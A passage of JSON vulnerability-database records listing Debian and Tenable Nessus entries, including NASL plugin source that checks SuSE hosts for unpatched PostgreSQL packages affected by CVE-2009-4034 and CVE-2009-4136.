"href": "http://www.debian.org/security/dsa-1964", "id": "DSA-1964", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:57:32", "references": ["http://support.novell.com/security/cve/CVE-2009-4034.html", "http://support.novell.com/security/cve/CVE-2009-4136.html"], "pluginID": "49920", "description": "The following bugs have been fixed :\n\nAn unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions. (CVE-2009-4136)\n\nEmbedded null bytes in the common name of SSL certificates could bypass certificate hostname checks. (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "edition": 4, "reporter": "Tenable", "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : PostgreSQL (ZYPP Patch Number 6768)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2012-05-17T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_POSTGRESQL-6768.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=49920", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(49920);\n script_version (\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2012/05/17 11:20:15 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"SuSE 10 Security Update : PostgreSQL (ZYPP Patch Number 6768)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following bugs have been fixed :\n\nAn unprivileged, authenticated PostgreSQL user could create a table\nwhich references functions with malicious content. Maintenance\noperations carried out be the database superuser could execute such\nfunctions. (CVE-2009-4136)\n\nEmbedded null bytes in the common name of SSL certificates\ncould bypass certificate hostname checks. (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4136.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6768.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"postgresql-devel-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"postgresql-libs-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-contrib-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-devel-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-docs-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-libs-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-pl-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"postgresql-server-8.1.19-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.1.19-0.4.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:45:44", "references": ["http://support.novell.com/security/cve/CVE-2009-4034.html", "https://bugzilla.novell.com/show_bug.cgi?id=564360", "http://support.novell.com/security/cve/CVE-2009-4136.html", "https://bugzilla.novell.com/show_bug.cgi?id=564710"], "pluginID": "44055", "description": "The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "edition": 4, "reporter": "Tenable", "published": "2010-01-19T00:00:00", "title": "SuSE 11 Security Update : PostgreSQL (SAT Patch Number 1766)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2013-10-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:postgresql-contrib", "p-cpe:/a:novell:suse_linux:11:postgresql-server", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:postgresql-docs", "p-cpe:/a:novell:suse_linux:11:postgresql-libs-32bit", "p-cpe:/a:novell:suse_linux:11:postgresql", "p-cpe:/a:novell:suse_linux:11:postgresql-libs"], "id": "SUSE_11_POSTGRESQL-100108.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44055", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44055);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2013/10/25 23:52:02 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"SuSE 11 Security Update : PostgreSQL (SAT Patch Number 1766)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could\n create a table which references functions with malicious\n content. Maintenance operations carried out be the\n database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL\n certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4136.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1766.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"postgresql-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"postgresql-libs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-libs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"postgresql-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"postgresql-contrib-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"postgresql-docs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"postgresql-libs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"postgresql-server-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-contrib-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-docs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-libs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"postgresql-server-8.3.9-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:36:00", "references": ["http://support.novell.com/security/cve/CVE-2009-4034.html", "https://bugzilla.novell.com/show_bug.cgi?id=564360", "http://support.novell.com/security/cve/CVE-2009-4136.html", "https://bugzilla.novell.com/show_bug.cgi?id=564710"], "pluginID": "52689", "description": "The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "edition": 4, "reporter": "Tenable", "published": "2011-03-17T00:00:00", "title": "SuSE 11 Security Update : PostgreSQL (SAT Patch Number 1766)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2013-10-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:postgresql-contrib", "p-cpe:/a:novell:suse_linux:11:postgresql-server", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:postgresql-docs", "p-cpe:/a:novell:suse_linux:11:postgresql-libs-32bit", "p-cpe:/a:novell:suse_linux:11:postgresql", "p-cpe:/a:novell:suse_linux:11:postgresql-libs"], "id": "SUSE_11_POSTGRESQL-100111.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=52689", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(52689);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2013/10/25 23:52:02 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"SuSE 11 Security Update : PostgreSQL (SAT Patch Number 1766)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could\n create a table which references functions with malicious\n content. Maintenance operations carried out be the\n database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL\n certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4136.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1766.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-contrib-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-docs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-libs-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-libs-32bit-8.3.9-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"postgresql-server-8.3.9-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:00:26", "references": ["http://support.novell.com/security/cve/CVE-2009-4034.html", "http://support.novell.com/security/cve/CVE-2009-4136.html"], "pluginID": "44050", "description": "The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "edition": 4, "reporter": "Tenable", "published": "2010-01-19T00:00:00", "title": "SuSE9 Security Update : PostgreSQL (YOU Patch Number 12571)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2012-04-23T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12571.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44050", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44050);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2012/04/23 18:21:33 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"SuSE9 Security Update : PostgreSQL (YOU Patch Number 12571)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following bugs have been fixed :\n\n - An unprivileged, authenticated PostgreSQL user could\n create a table which references functions with malicious\n content. Maintenance operations carried out be the\n database superuser could execute such functions.\n (CVE-2009-4136)\n\n - Embedded null bytes in the common name of SSL\n certificates could bypass certificate hostname checks.\n (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4136.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12571.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-contrib-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-devel-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-docs-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-libs-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-pl-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"postgresql-server-7.4.27-0.1\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"postgresql-libs-32bit-9-201001081716\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:59:51", "references": ["http://support.novell.com/security/cve/CVE-2009-4034.html", "http://support.novell.com/security/cve/CVE-2009-4136.html"], "pluginID": "44056", "description": "The following bugs have been fixed :\n\nAn unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions. (CVE-2009-4136)\n\nEmbedded null bytes in the common name of SSL certificates could bypass certificate hostname checks. (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "edition": 4, "reporter": "Tenable", "published": "2010-01-19T00:00:00", "title": "SuSE 10 Security Update : PostgreSQL (ZYPP Patch Number 6767)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2012-05-17T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_POSTGRESQL-6767.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44056", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44056);\n script_version (\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2012/05/17 11:20:15 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"SuSE 10 Security Update : PostgreSQL (ZYPP Patch Number 6767)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The following bugs have been fixed :\n\nAn unprivileged, authenticated PostgreSQL user could create a table\nwhich references functions with malicious content. Maintenance\noperations carried out be the database superuser could execute such\nfunctions. (CVE-2009-4136)\n\nEmbedded null bytes in the common name of SSL certificates\ncould bypass certificate hostname checks. (CVE-2009-4034)\n\nPostgreSQL was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4034.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-4136.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6767.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2012 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< 